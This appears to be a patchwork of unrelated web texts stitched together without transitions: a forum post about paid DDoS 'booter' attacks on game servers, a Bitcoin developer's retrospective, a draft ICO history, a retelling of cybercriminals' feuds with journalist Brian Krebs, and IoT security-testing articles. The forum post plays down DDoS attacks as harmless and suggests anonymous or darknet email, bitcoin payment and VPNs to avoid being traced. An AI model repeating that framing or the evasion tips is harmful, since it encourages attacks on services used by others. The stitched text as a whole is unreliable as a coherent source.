commands ect, that's why the game does not crash but nobody is able to move around. The most popular Botnets for R6 can have between 50 - 10'000 bots connected, that's why booters feel safe when performing these attacks on MS servers, it can be very hard to define where the source of the attack is located, when 10'000 Computers all across the globe attack your server at once. As i said earlier, many youtubers are starting to react to the community by making videos explaining the possible consequences to booting servers, talking about federal crimes, 10 years of imprisonnement ect.. What do you guys think, is it to scare the 12 year olds from trying to do these things or could it happen that Ubisoft takes people to court for this. I mean technically the booter is not damaging anything, he doesn't steal or publish company data, and most of the servers are up and working again 10 minutes after the ddos. If you're a bit clever you will use a anonymous Email Adress for the service, possibly darknet mail, most booters accept bitcoin payments and suggest VPN usage, so i think the amount of work behind tracking down some 12 year old trying to get an advantage in Ranked is going to cost the company a lot of money and time... I think all they can do is improve the security against these attacks and hope that hackers cannot figure out other efficient ways of stressing the servers. People are saying why does ubisoft not just have own servers, that will likely never happen, because the costs of running such an infrastructure, with security, server rooms, cooling and Power costs, would never be an option for Ubi. Feel free to share your knowledge and ideas or questions in this thread.
Data Selfie is a browser extension that tracks you while you are on Facebook to show you your own data traces and reveal what machine learning algorithms could predict about your personality based on that data.
Hello again. It's been a while. People have been emailing me about once a week or so for the last year to ask if I'm coming back to Bitcoin now that Bitcoin Cash exists. And a couple of weeks ago I was summoned on a thread called "Ask Mike Hearn Anything", but that was nothing to do with me and I was on holiday in Japan at the time. So I figured I should just answer all the different questions and answers in one place rather than keep doing it individually over email. Firstly, thanks for the kind words on this sub. I don't take part anymore but I still visit occasionally to see what people are talking about, and the people posting nice messages is a pleasant change from three years ago. Secondly, who am I? Some new Bitcoiners might not know. I am Satoshi. Just kidding. I'm not Satoshi. I was a Bitcoin developer for about five years, from 2010-2015. I was also one of the first Bitcoin users, sending my first coins in April 2009 (to SN), about 4 months after the genesis block. I worked on various things:
My main effort was an implementation of a Java library called bitcoinj. This was the engine used in the first p2p mobile wallet ("Bitcoin Wallet for Android"), and the first p2p desktop wallet that was faster to run than Bitcoin [Core] itself (MultiBit). These together were responsible for around 2.5 million user installs at a time when downloading the full block chain was becoming too slow for normal users to tolerate and the only alternative was a "bitbank" or cloud-hosted wallet. It was used in the first trustless gambling site (SatoshiDice), over 100 products and projects, and many academic research papers.
With Gavin Andresen and others I designed some upgrades to the Bitcoin protocol like Bloom filtering and BIP70.
With Matt Corrallo I implemented and demonstrated the first version of (micro)payment channels. I put together a demo of a file server that charged micropayments using a GUI called Payfile (mentioned in New Scientist here). I used to have a video of this but unfortunately it no longer seems to be on YouTube. Payment channels went on to be used in the design of the Lightning Network.
You can see a trend here - I was always interested in developing peer to peer decentralised applications that used Bitcoin. But what I'm best known for is my role in the block size debate/civil war, documented by Nathaniel Popper in the New York Times. I spent most of 2015 writing extensively about why various proposals from the small-block/Blockstream faction weren't going to work (e.g. on replace by fee, lightning network, what would occur if no hard fork happened, soft forks, scaling conferences etc). After Blockstream successfully took over Bitcoin Core and expelled anyone who opposed them, Gavin and I forked Bitcoin Core to create Bitcoin XT, the first alternative node implementation to gain any serious usage. The creation of XT led to the imposition of censorship across all Bitcoin discussion forums and news outlets, resulted in the creation of this sub, and Core supporters paid a botnet operator to force XT nodes offline with DDoS attacks. They also convinced the miners and wider community to do nothing for years, resulting in the eventual overload of the main network. I left the project at the start of 2016, documenting my reasons and what I expected to happen in my final essay on Bitcoin in which I said I considered it a failed experiment. Along with the article in the New York Times this pierced the censorship, made the wider world aware of what was going on, and thus my last gift to the community was a 20% drop in price (it soon recovered).
The last two years
Left Bitcoin ... but not decentralisation. After all that went down I started a new project called Corda. You can think of Corda as Bitcoin++, but modified for industrial use cases where a decentralised p2p database is more immediately useful than a new coin. Corda incorporates many ideas I had back when I was working on Bitcoin but couldn't implement due to lack of time, resources, because of ideological wars or because they were too technically radical for the community. So even though it's doesn't provide a new cryptocurrency out of the box, it might be interesting for the Bitcoin Cash community to study anyway. By resigning myself to Bitcoin's fate and joining R3 I could go back to the drawing board and design with a lot more freedom, creating something inspired by Bitcoin's protocol but incorporating all the experience we gained writing Bitcoin apps over the years. The most common question I'm asked is whether I'd come back and work on Bitcoin again. The obvious followup question is - come back and work on what? If you want to see some of the ideas I'd have been exploring if things had worked out differently, go read the Corda tech white paper. Here's a few of the things it might be worth asking about:
Corda's data model is a UTXO ledger, like Bitcoin. Outputs in Corda (called "states") can be arbitrary data structures instead of just coin amounts, so you don't need hacks like coloured coins anymore. You can track arbitrary fungible assets, but you can also model things like the state of a loan, deal, purchase order, crate of cargo etc.
Transactions are structured as Merkle trees.
Corda has a compound key format that can represent more flexible conditions than CHECKMULTISIG can.
Smart contracts are stateless predicates like in Bitcoin, but you can loop like in Ethereum. Unlike Bitcoin and Ethereum we do not invent our own VM or languages.
Transactions can have files attached to them. Smart contracts in Corda are stored in attachments and referenced by hash, so large programs aren't duplicated inside every transaction.
The P2P network is encrypted.
Back in 2014 I wrote that Bitcoin needed a store and forward network, to make app dev easier, and to improve privacy. Corda doesn't have a store and forward network - Corda is a store and forward network.
It has a "flow framework" that makes structured back-and-forth conversations very easy to program. This makes protocols like payment channelss a lot quicker and easier to implement, and would have made Lighthouse much more straightforward. A big part of my goal with Corda was to simplify the act of building complicated decentralised applications, based on those Bitcoin experiences. Lighthouse took about 8 months of full time work to build, but it's pretty spartan anyway. That's because Bitcoin offers almost nothing to developers who want to build P2P apps that go beyond simple payments. Corda does.
The flow framework lets you do hard things quickly. For example, we took part in a competition called Project Ubin, the goal of which was to develop something vaguely analogous in complexity to the Lightning Network or original Ripple (decentralised net-out of debts). But we had about six weeks and one developer. We successfully did that in the time allowed. Compare that to dev time for the Lightning Network.
Corda scales a lot better than Bitcoin, even though Bitcoin could have scaled to the levels needed for large payment networks with enough work and time. It has something similar to what Ethereum calls "sharding". This is possible partly because Corda doesn't use proof of work.
It has a mechanism for signalling the equivalent of hard forks.
It provides much better privacy. Whilst it supports techniques like address randomisation, it also doesn't use global broadcast and we are working on encrypting the entire ledger using Intel SGX, such that no human has access to the raw unencrypted data and such that it's transparent to application developers (i.e. no need to design custom zero knowledge proofs)
Writing a short early history of ICOs, starting with altcoins - anything important I've missed?
This is for the forever-forthcoming ICO book. But I figured I needed to talk about altcoins first, the previous generation of shitcoins. This is mostly from dredging early altcoin stuff on Bitcointalk. There needs to be a bit of the end that leads from The DAO as a world-famous ICO to the 2017 crypto bubble, and ICOs booming in that. Is there anything super-relevant I've missed? In the context of ICOs as we now know them, not just altcoins. Ethereum and Ripple probably. The early history of ICOs In the beginning was Bitcoin. That’s the start for every cryptocurrency and blockchain story. Different parts are important to different people — fun and interesting technology, decentralised money, fighting the oppressive statist jackboots of taxation, sticking it to the man. What ICOs inherit from Bitcoin is the notion of inventing your own magical Internet money — so you can get rich for free. Bitcoin was released in January 2009 as an open protocol, implemented as open source code — anyone could take a copy of it, twiddle it a bit and have a new coin. It took until April 2011 for the first “fork” of the Bitcoin code to come out — Namecoin, an attempt at a decentralised replacement for the Internet’s Domain Name Service (DNS). It was another four months until someone came up with a general altcoin, usable as a Bitcoin-style payment system — Ixcoin, on 10 August 2011. The creator, “Thomas Nasakioto” — an anagram of "Satoshi Nakamoto"; he used a picture of Japanese actor Hiroyuki Sanada as his forum avatar — disappeared less than a month later, having scored about 50 bitcoins in the process. “Pretty sure it’s dead,” said one commenter. “It has served his purpose. Many people made quite a few BTC out of it.” A flood of what were rapidly labeled “altcoins” followed — i0coin, Solidcoin, RRCoin, Tenebrix, Litecoin. The Freenode Internet Relay Chat network started banning cryptocurrency servers that made automated network announcements around this time, rather than deal with what looked “like a botnet using their network.” The first Initial Coin Offering as we know it is commonly held to be Mastercoin in July 2013. Mastercoin became OmniLayer — the platform for Tether. Mastercoin was the first sale of a token that ran as an application on top of another blockchain — in this case, Bitcoin: “I am VERY excited to announce that I now have a complete specification for building a protocol layer on top of bitcoin (like how HTTP runs on top of TCP/IP).” Mastercoin didn’t use the phrase “Initial Coin Offering.” The phrase “IPO” — “Initial Public Offering,” in the manner of stock offerings for companies going public — was being used for altcoin offerings by 2014. IronBankCoin used “initial coin offering” and “ICO” by July 2014 — “The initial coin offering will be of 21% of the coin cap during the PoW (Proof of Work) stage” and “Initial Distribution of the Land (ICO info): ICO? Aren't those all scams?” Mastercoin never really took off as a token platform — that didn’t come until Ethereum made tokens easy to set up in 2015, and The DAO got press worldwide in 2016 by showing just how much money an ICO could pull in. Even as The DAO proceeded to lose $50 million to a hacker five days after launch.
A few stories about Brian Krebs: The independent cybercrime journalist who exposes criminals on the internet
First, a bit of introduction before we get into the living drama that is Brian Krebs. Brian Krebs has been a journalist for decades, starting in the late 90s. He got his start at The Washington Post, but what he's most famous for are his exposes on criminal businesses and individuals who perpetuate cyber crime worldwide. In 2001, he got his interest in cybercrime piqued when a computer worm locked him out of his own computer. In 2005, he shifted from working as a staff writer at The Washington Post's tech newswire to writing for their security blog, "Security Wire". During his tenure there, he started by focusing on the victims of cybercrime, but later also started to focus on the perpetrators of it as well. His reporting helped lead to the shutdown of McColo, a hosting provider who provided service to some of the world's biggest spammers and hackers. Reports analyzing the shutdown of McColo estimated that global spam volume dropped by between 40 and 70 percent. Further analysis revealed it also played host to child pornography sites, and the Russian Business Network, a major Russian cybercrime ring. In 2009, Krebs left to start his own site, KrebsOnSecurity. Since then, he's been credited with being the first to report on major events such as Stuxnet and when Target was breached, resulting in the leakage of 40 million cards. He also regularly investigates and reveals criminals' identities on his site. The latter has made him the bane of the world of cybercrime, as well as basically a meme, where criminals will include references like Made by Brian Krebs in their code, or name their shops full of stolen credit cards after him. One of his first posts on his new site was a selection of his best work. While not particularly dramatic, they serve as an excellent example of dogged investigative work, and his series reveal the trail of takedowns his work has documented, or even contributed to. And now, a selection of drama involving Krebs. Note, all posts are sarcastically-tinged retellings of the source material which I will link throughout. I also didn't use the real names in my retellings, but they are in the source material. This took way too long to write, and it still does massively condense the events described in the series. Krebs has been involved with feuds with other figures, but I'd argue these tales are the "main" bits of drama that are most suited for here.
Fly on the Wall
By 2013, Krebs was no stranger to cybercriminals taking the fight to the real world. He was swatted previously to the point where the police actually know to give him a ring and see if there'd actually been a murder, or if it was just those wacky hackers at it again. In addition, his identity was basically common knowledge to cybercriminals, who would open lines of credit in his name, or find ways to send him money using stolen credit cards. However, one particular campaign against him caught his eye. A hacker known as "Fly" aka "Flycracker" aka "MUXACC1" posted on a Russian-language fraud forum he administered about a "Krebs fund". His plan was simple. Raise Bitcoin to buy Heroin off of a darknet marketplace, address it to Krebs, and alert his local police via a spoofed phone call. Now, because Krebs is an investigative journalist, he develops undercover presences on cybercrime forums, and it just so happened he'd built up a presence on this one already.
Guys, it became known recently that Brian Krebs is a heroin addict and he desperately needs the smack, so we have started the "Helping Brian Fund", and shortly we will create a bitcoin wallet called "Drugs for Krebs" which we will use to buy him the purest heroin on the Silk Road. My friends, his withdrawal is very bad, let’s join forces to help the guy! We will save Brian from the acute heroin withdrawal and the world will get slightly better!
Fly had first caught Krebs' attention by taunting him on Twitter, sending him Tweets including insults and abuse, and totally-legit looking links. Probably either laced with malware, or designed to get Krebs' IP. He also took to posting personal details such as Krebs' credit report, directions to his house, and pictures of his front door on LiveJournal, of all places. So, after spotting the scheme, he alerted his local police that he'd probably have someone sending him some China White. Sure enough, the ne'er-do-wells managed to raise 2 BTC, which at the time was a cool $200 or so. They created an account on the premiere darknet site at the time, The Silk Road under the foolproof name "briankrebs7". They found one seller who had consistently high reviews, but the deal fell through for unknown reasons. My personal theory is the seller decided to Google where it was going, and realized sending a gram of dope into the waiting arms of local law enforcement probably wasn't the best use of his time. Still, the forum members persevered, and found another seller who was running a buy 10 get 2 free promotion. $165 of Bitcoin later, the drugs were on their way to a new home. The seller apparently informed Fly that the shipment should arrive by Tuesday, a fact which he gleefully shared with the forum. While our intrepid hero had no doubt that the forum members were determined to help him grab the tail of the dragon, he's not one to assume without confirmation, and enlisted the help of a graduate student at UCSD who was researching Bitcoin and anonymity on The Silk Road, and confirmed the address shared by Fly was used to deposit 2 BTC into an account known to be used for money management on the site. By Monday, an envelope from Chicago had arrived, containing a copy of Chicago confidential. Taped inside were tiny baggies filled with the purported heroin. Either dedicated to satisfied customers, or mathematically challenged, the seller had included thirteen baggies instead of the twelve advertised. A police officer arrived to take a report and whisked the baggies away. Now, Fly was upset that Krebs wasn't in handcuffs for drug possession, and decided to follow up his stunt by sending Krebs a floral arrangement shaped like a cross, and an accompanying threatening message addressed to his wife, the dire tone slightly undercut by the fact that it was signed "Velvet Crabs". Krebs' curiosity was already piqued from the shenanigans with the heroin, but with the arrival of the flowers decided to dive deeper into the сука behind things. He began digging into databases from carding sites that had been hacked, but got his first major breakthrough to his identity from a Russian computer forensics firm. Fly had maintained an account on a now-defunct hacking forum, whose database was breached under "Flycracker". It turns out, the email Flycracker had used was also hacked at some point, and a source told Krebs that the email was full of reports from a keylogger Fly had installed on his wife's computer. Now, because presumably his wife wasn't part of, or perhaps even privy to her husband's illicit dealings, her email account happened to be her full legal name, which Krebs was able to trace to her husband. Now, around this time, the site Fly maintained disappeared from the web, and administrators on another major fraud forum started purging his account. This is a step they typically take when they suspect a member has been apprehended by authorities. Nobody knew for sure, but they didn't want to take any chances. More research by Krebs revealed that the criminals' intuition had been correct, and Fly was arrested in Italy, carrying documents under an assumed name. He was sitting in an Italian jail, awaiting potential extradition to the United States, as well as potentially facing charges in Italy. This was relayed to Krebs by a law enforcement official who simply said "The Fly has been swatted". (Presumably while slowly removing a pair of aviator sunglasses) While Fly may have been put away, the story between Krebs and Fly wasn't quite over. He did end up being extradited to the US for prosecution, but while imprisoned in Italy, Fly actually started sending Krebs letters. Understandably distrustful after the whole "heroin" thing, his contacts in federal law enforcement tested the letter, and found it to be clean. Inside, there was a heartfelt and personal letter, apologizing for fucking with Krebs in so many ways. He also forgave Krebs for posting his identity online, leading him to muse that perhaps Fly was working through a twelve-step program. In December, he received another letter, this time a simple postcard with a cheerful message wishing him a Merry Christmas and a Happy New Year. Krebs concluded his post thusly:
Cybercrooks have done some pretty crazy stuff to me in response to my reporting about them. But I don’t normally get this kind of closure. I look forward to meeting with Fly in person one day soon now that he will be just a short train ride away. And he may be here for some time: If convicted on all charges, Fly faces up to 30 years in U.S. federal prison.
Criminals are none too happy when they find their businesses and identities on the front page of KrebsOnSecurity. It usually means law enforcement isn't far behind. One such business was known as vDOS. A DDOS-for-hire (also known as a "booter" or a "stresser") site that found itself hacked, with all their customer records still in their databases leaked. Analysis of the records found that in a four-month time span, the service had been responsible for about 8.81 years worth of attack time, meaning on average at any given second, there were 26 simultaneous attacks running. Interestingly, the hack of vDOS came about from another DDOS-for-hire site, who as it turns out was simply reselling services provided by vDOS. They were far from the only one. vDOS appeared to provide firepower to a large number of different resellers. In addition to the attack logs, support messages were also among the data stolen. This contained some complaints from various clients who complained they were unable to launch attacks against Israeli IPs. This is a common tactic by hackers to try and avoid unwanted attention from authorities in their country of residence. This was confirmed when two men from Israel were arrested for their involvement in owning and running vDOS. However, this was just the beginning for this bit of drama. The two men arrested went by the handles "applej4ck" and "Raziel". They had recently published a paper on DDOS attack methods in an online Israeli security magazine. Interestingly, on the same day the men were arrested, questioned, and released on bail, vDOS went offline. Not because it had been taken down by Israeli authorities, not because they had shut it down themselves, but because a DDOS protection firm, BackConnect Security, had hijacked the IP addresses belonging to the company. To spare a lot of technical detail, it's called a BGP hijack, and it basically works by a company saying "Yeah, those are our addresses." It's kind of amazing how much of the internet is basically just secured by the digital equivalent of pinky swears. You can read some more technical detail on Wikipedia. Anyway, we'll get back to BackConnect. Following the publication of the story uncovering the inner workings of vDOS, KrebsOnSecurity was hit with a record breaking DDOS attack, that peaked at 620/Gbps, nearly double the most powerful DDOS attack previously on record. To put that in perspective, that's enough bandwidth to download 5 simultaneous copies of Interstellar in 4K resolution every single second, and still have room to spare. The attack was so devastating, Akamai, one of the largest providers of DDOS protection in the world had to drop Krebs as a pro bono client. Luckily, Google was willing to step in and place his site under the protection of Google's Project Shield, a free service designed to protect the news sites and journalists from being knocked offline by DDOS attacks. This attack was apparently in retaliation for the vDOS story, since some of the data sent in the attack included the string "freeapplej4ck". The attack was executed by a botnet of Internet of Things (or IoT) devices. These are those "smart" devices like camera systems, routers, DVRs. Basically things that connect to the cloud. An astounding amount of those are secured with default passwords that can be easily looked up from various sites or even the manufacturers' websites. This was the start of a discovery of a massive botnet that had been growing for years. Now time for a couple quick side stories: Dyn, a company who provides DNS to many major companies including Twitter, Reddit, and others came under attack, leaving many sites (including Twitter and Reddit) faltering in the wake of it. Potentially due to one of their engineers' collaboration with Krebs on another story. It turned out that the same botnet that attacked Krebs' site was at least part of the attack on Dyn And back to BackConnect, that DDOS protection firm that hijacked the IP addresses from vDOS. Well it turns out BGP Hijacks are old hat for the company. They had done it at least 17 times before. Including at least once (purportedly with permission) for the address 188.8.131.52. Aka, "leet". It turns out one of the co-founders of BackConnect actually posted screenshots of him visiting sites that tell you your public IP address in a DDOS mitigation industry chat, showing it as 184.108.40.206. They also used a BGP Hijack against a hosting company and tried to frame a rival DDOS mitigation provider. Finally, another provider, Datawagon was interestingly implicated in hosting DDOS-for-hire sites while offering DDOS protection. In a Skype conversation where the founder of Datawagon wanted to talk about that time he registered dominos.pizza and got sued for it, he brings up scanning the internet for vulnerable routers completely unprompted. Following the publication of the story about BackConnect, in which he was included in, he was incensed about his portrayal, and argued with Krebs over Skype before Krebs ultimately ended up blocking him. He was subsequently flooded with fake contact requests from bogus or hacked Skype accounts. Shortly thereafter, the record-breaking DDOS attack rained down upon his site. Back to the main tale! So, it turns out the botnet of IoT devices was puppeteered by a malware called Mirai. How did it get its name? Well, that's the name its creator gave it, after an anime called Mirai Nikki. How did this name come to light? The creator posted the source code online. (The name part, not the origin. The origin didn't come 'til later.) The post purported that they'd picked it up from somewhere in their travels as a DDOS industry professional. It turns out this is a semi-common tactic when miscreants fear that law enforcement might come looking for them, and having the only copy of the source code of a malware in existence is a pretty strong indicator that you have something to do with it. So, releasing the source to the world gives a veneer of plausible deniability should that eventuality come to pass. So who was this mysterious benefactor of malware source? They went by the name "Anna-senpai". As research on the Mirai botnet grew, and more malware authors incorporated parts of Mirai's source code into their own attacks, attention on the botnet increased, and on the people behind it. The attention was presumably the reason why Hackforums, the forum where the source code was posted, later disallowed ostensible "Server Stress Tester" services from being sold on it. By December, "Operation Tarpit" had wrought 34 arrests and over a hundred "knock and talk" interviews questioning people about their involvement. By January, things started to come crashing down. Krebs published an extensive exposé on Anna-senpai detailing all the evidence linking them to the creation of Mirai. The post was so big, he included a damn glossary. What sparked the largest botnet the internet had ever seen? Minecraft. Minecraft servers are big business. A popular one can earn tens of thousands of dollars per month from people buying powers, building space, or other things. It's also a fiercely competitive business, with hundreds of servers vying for players. It turns out that things may have started, as with another set of companies, two rival DDOS mitigation providers competing for customers. ProTraf was a provider of such mitigation technology, and a company whose owner later worked for ProTraf had on at least one occasion hijacked addresses belonging to another company, ProxyPipe. ProxyPipe had also been hit with DDOS attacks they suspected to be launched by ProTraf. While looking into the President of ProTraf, Krebs realized he'd seen the relatively uncommon combination of programming languages and skills posted by the President somewhere else. They were shared by Anna-senpai on Hackforums. As Krebs dug deeper and deeper into Anna-senpai's online presence, he uncovered other usernames, including one he traced to some Minecraft forums where a photoshopped picture of a still from Pulp Fiction contained the faces of BackConnect, which was a rival to ProTraf's DDOS mitigation business, and another face. A hacker by the name of Vyp0r, who another employee of ProTraf claimed betrayed his trust and blackmailed him into posting the source of another piece of malware called Bashlite. There was also a third character photoshopped into the image. An anime character named "Yamada" from a movie called B Gata H Hei. Interestingly, under the same username, Krebs found a "MyAnimeList" profile which, out of 9 titles it had marked as watched, were B Gata H Hei, as well as Mirai Nikki, the show from which Mirai derived its name. It continues on with other evidence, including DDOS attacks against Rutgers University, but in short, there was little doubt in the identity of "Anna-senpai", but the person behind the identity did contact Krebs to comment. He denied any involvement in Mirai or DDOS attacks.
"I don’t think there are enough facts to definitively point the finger at me," [Anna-senpai] said. "Besides this article, I was pretty much a nobody. No history of doing this kind of stuff, nothing that points to any kind of sociopathic behavior. Which is what the author is, a sociopath."
I don't have the time or energy to write another effortpost, and as is I'm over 20,000 characters, so here's a few other tidbits of Krebs' clashes with miscreants.
A source and security researcher he was talking to started blabbing about him working with Krebs, and also was selling data to hackers on the side. His example data in his sales post was fucking Brian Krebs'.
IoT is a whole ecosystem that contains intelligent devices equipped with sensors (sensors) that provide remote control, storage, transmission and security of data. The Internet of Things (IoT) is an innovative solution in various areas such as healthcare, insurance, labor protection, logistics, ecology, etc. To unleash the full potential of using IoT devices, it is necessary to solve many problems related to standards, security, architecture, ecosystem construction, channels and device connection protocols. Today in the world, large organizations such as NIST, IEEE, ISO / IEC, and others make enormous efforts in addressing the issues of standardization, security, and the architecture of developed devices. Analysis of recent scientific research in the field of solving information security issues and data privacy of IoT devices showed positive results, but these methods and approaches are based on traditional methods of network security. The development and application of security mechanisms for IoT devices is a complex and heterogeneous task. In this regard, ensuring information security and the protection of sensitive data, as well as the availability of IoT devices, is the main purpose of writing this article. Given the above, many questions arise related to the security status of IoT devices, namely: What are the current standards and protocols for IoT? What are the requirements for ensuring information security of IoT devices? What security mechanisms do IoT devices have? What methods of testing IoT devices exist? Manufacturers and developers of IoT devices do not pay enough attention to security issues. With the development of cyber-attacks, attack vectors are becoming more sophisticated and aimed at several infrastructure elements at the same time. IoT infrastructure typically includes millions of connected objects and devices that store and share confidential information. Scenarios of theft and fraud, such as hacking and falsifying personal data, pose a serious threat to such IoT devices. Most IoT devices use the public Internet to exchange data, which makes them vulnerable to cyber-attacks. Modern approaches to information security often offer solutions to individual problems, when multi-level approaches offer increased resistance to cyber-attacks. Challenges of testing IoT devices To a request to name essential items, many would answer: food, a roof over your head, clothes … With one caveat: this was the case in the last century. Since then, the species Homo Sapiens has accumulated needs. We need automatic sensors to control the lighting, not just switches, for smart systems to monitor health and car traffic. The list goes on … In general, we can make life easier and better. Let’s try to figure out how all this Internet of things works before moving on to testing. IoT testing Content What is the Internet of Things (IoT)? Examples of IoT devices # 1) Wearable technology: # 2) Infrastructure and development # 3) Health Technologies that are present in IoT IoT Testing # 1) Usability: # 2) IoT Security: # 3) Network features: # 4) Efficiency: # 5) Compatibility testing: # 6) Pilot testing: # 7) Check for compliance: # 8) Testing updates: IoT testing challenges # 1) Hard / soft # 2) Device Interaction Model # 3) Testing data coming in real time # 4) UI # 5) Network Availability IoT Testing Tools # 1) Software: # 2) Hard: Total What is the Internet of Things (IoT)? The Internet of things (or IoT) is a network that combines many objects: vehicles, home automation, medical equipment, microchips, etc. All these constituent elements accumulate and transmit data. Through this technology, the user controls the devices remotely.
Examples of IoT devices
# 1) Wearable technology: Fitbit Fitness Bracelets and Apple Watch smart watches sync seamlessly with other mobile devices.
IoT – watches and bracelets
Itís easier to collect health information: heart rate, body activity during sleep, etc. # 2) Infrastructure and development The CitySense app analyzes lighting data online and turns lights on and off automatically. There are applications that control traffic lights or report on the availability of parking lots. # 3) Health Some health monitoring systems are used in hospitals. The basis of their work is indicative data. These services control the dosage of drugs at different times of the day. For example, the UroSense application monitors the level of fluid in the body and, if necessary, increases this level. And doctors will learn about patient information wirelessly. Technologies that are present in IoT RFID (Radio Frequency Identification), EPC (Electronic Product Code) NFC (ìNear Field Communicationî) provides two-way communication between devices. This technology is present in smartphones and is used for contactless transactions. Bluetooth It is widely used in situations where near-field communication is sufficient. Most often present in wearable devices. Z-Wave. Low frequency RF technology. Most often used for home automation, lighting control, etc. WiFi. The most popular network for IoT (file, data and message transfer). IoT Testing Consider an example : a medical system that monitors health status, heart rate, fluid content, and sends reports to healthcare providers. Data is displayed in the system; archives available. And doctors are already deciding whether to take medication for the patient remotely. IoT architecture There are several approaches for testing the IoT architecture. # 1) Usability: It is necessary to provide usability testing of each device. A medical device that monitors your health should be portable. Sufficiently thought out equipment is needed that would send not only notifications, but also error messages, warnings, etc. The system must have an option that captures events, so that the end user understands. If this is not possible, event information is stored in the database. The ability to process data and exchange tasks between devices is carefully checked. # 2) IoT Security: Data is at the heart of all connected devices. Therefore, unauthorized access during data transfer is not ruled out. From the point of view of software testing, it is necessary to check how secure / encrypted the data is. If there is a UI, you need to check if it is password protected. # 3) Network features: Network connectivity and IoT functionality are critical. After all, we are talking about a system that is used for health purposes. Two main aspects are tested: The presence of a network , the possibility of data transfer (whether jobs are transferred from one device to another without any hitch). The scenario when there is no connection . Regardless of the level of reliability of the system, it is likely that the status of the system will be ìofflineî. If the network is unavailable, employees of the hospital or other organization need to know about it (notifications). Thus, they will be able to monitor the condition of the patient themselves, and not wait for the system to work. On the other hand, in such systems there is usually a mechanism that saves data if the system is offline. That is, data loss is eliminated. # 4) Efficiency: It is necessary to take into account the extent to which the healthcare solution is applicable in specific conditions. In testing, from 2 to 10 patients participate, data is transmitted to 10-20 devices. If the entire hospital is connected to the network, this is already 180-200 patients. That is, there will be more actual data than test data. In addition, it is necessary to test the utility for monitoring the system: current load, power consumption, temperature, etc. # 5) Compatibility testing: This item is always present in the plan for testing the IoT system. The compatibility of different versions of operating systems, browser types and their respective versions, devices of different generations, communication modes [for example, Bluetooth 2.0, 3.0] is extremely important for IoT. # 6) Pilot testing: Pilot testing is a mandatory point of the test plan. Only tests in the laboratory will allow us to conclude that the system is functional. In pilot testing, the number of users is limited. They make manipulations with the application and express their opinion. These comments turn out to be very helpful, they make a reliable application. # 7) Check for compliance: The system, which monitors the state of health, undergoes many compliance checks. It also happens that a software product passes all stages of testing, but fails the final test for compliance [testing is carried out by the regulatory body]. It is more advisable to check for compliance with norms and standards before starting the development cycle. # 8) Testing updates: IoT is a combination of many protocols, devices, operating systems, firmware, hardware, network layers, etc. When an update occurs – be it a system or something else of the above – rigorous regression testing is required. The overall strategy is being amended to avoid the difficulties associated with the upgrade.
IoT testing challengesIoT testing
# 1) Hard / soft IoT is an architecture in which software and hardware components are closely intertwined. Not only software is important, but also hard: sensors, gateways, etc. Functional testing alone will not be enough to certify the system. All components are interdependent. IoT is much more complicated than simpler systems [only software or only hard]. # 2) Device Interaction Model Components of the network must interact in real time or close to real. All this becomes a single whole – hence the additional difficulties associated with IoT (security, backward compatibility and updates). # 3) Testing data coming in real time Obtaining this data is extremely difficult. The matter is complicated by the fact that the system, as in the described case, may relate to the health sector. # 4) UI An IoT network usually consists of different devices that are controlled by different platforms [iOS, Android, Windows, linux]. Testing is possible only on some devices, since testing on all possible devices is almost impossible. # 5) Network Availability Network connectivity plays an important role in IoT. The data rate is increasing. IoT architecture should be tested under various connection conditions, at different speeds. Virtual network emulators in most cases are used to diversify network load, connectivity, stability, and other elements of load testing . But the evidence is always new scenarios, and the testing team does not know where the difficulties will arise in the future.
IoT Testing ToolsIoT and software
There are many tools that are used in testing IoT systems. They are classified depending on the purpose: # 1) Software: Wireshark : An open source tool. Used to monitor traffic in the interface, source / given host address, etc. Tcpdump : This tool does a similar job. The utility does not have a GUI, its interface is the command line. It enables the user to flash TCP / IP and other packets that are transmitted over the network. # 2) Hard: JTAG Dongle: A tool similar to debuggers in PC applications. Allows you to find defects in the code of the target platform and shows the changes step by step. Digital Storage Oscilloscope : checks various events using time stamps, power outages, signal integrity. Software Defined Radio : emulates a transmitter and receiver for various wireless gateways. IoT is an emerging market and many opportunities. In the foreseeable future, the Internet of things will become one of the main areas of work for tester teams. Network devices, smart gadget applications, communication modules – all this plays an important role in the study and evaluation of various services. Total The approach to testing IoT may vary depending on the specific system / architecture. Itís difficult to test IoT, but at the same time itís an interesting job, since testers have a good place to swing – there are many devices, protocols and operating systems. PS You should try out the TAAS format (“tests from the user’s point of view”), and not just fulfill the formal requirements. ————— Smart watches, baby-sitters, wireless gadgets and devices such as, for example, a portable radio station have long been part of everyday life. Hackers have already proven that many of these attacks on IoT are possible. Many people in general first learned about IoT security threats when they heard about the Mirai botnet in September 2016. According to some estimates, Mirai infected about 2.5 million IoT devices, including printers, routers and cameras connected to the Internet. The botnetís creators used it to launch distributed denial of service (DDoS) attacks, including an attack on the KrebsonSecurity cybersecurity blog. In fact, the attackers used all devices infected with Mirai to try to connect to the target site at the same time, in the hope of suppressing the servers and preventing access to the site. Since Mirai was first published on the news, attackers launched other botnet attacks on IoT, including Reaper and Hajime. Experts say that such attacks are most likely in the future. The Internet of Things (IoT) can bring many advantages to modern life, but it also has one huge drawback: security threats. In its 2018 IOT forecasts, Forroter Research notes: ìSecurity threats are a major concern for companies deploying IoT solutions – in fact, this is the main task of organizations looking to deploy IoT solutions. However, most firms do not regularly prevent IoT-specific security threats, and business pressure suppresses technical security issues. î IoT security risks can be even more significant on the consumer side, where people are often unaware of potential threats and what they should do to avoid threats. A 2017 IoT security survey sponsored by Gemalto Security Provider found that only 14 percent of consumers surveyed consider themselves IoT-aware. This number is particularly noteworthy because 54 percent of the respondents owned an average of four IoT devices. And these IoT security threats are not just theoretical. Hackers and cybercriminals have already found ways to compromise many IoT devices and networks, and experts say that successful attacks are likely to increase. Forrester predicted: “In 2018, we will see more attacks related to IoT … except that they will increase in scale and loss.” What types of IoT security threats will enterprises and consumers face in 2018? Based on historical precedent, here are ten of the most likely types of attacks.
Botnets and DDoS attacks
Remote recording The possibility that attackers can hack IoT devices and record owners without their knowledge is not revealed as a result of the work of hackers, but as a result of the work of the Central Intelligence Agency (CIA).
Documents released by WikiLeaks implied that the spy agency knew about dozens of zero-day exploits for IoT devices, but did not disclose errors, because they hoped to use vulnerabilities to secretly record conversations that would reveal the actions of alleged opponents of America. Documents pointed to vulnerabilities in smart TVs, as well as on Android and iOS smartphones. The obvious consequence is that criminals can also exploit these vulnerabilities for their vile purposes.
Spam In January 2014, one of the first known attacks using IoT devices used more than 100,000 Internet-connected devices, including televisions, routers, and at least one smart refrigerator to send 300,000 spam emails per day.
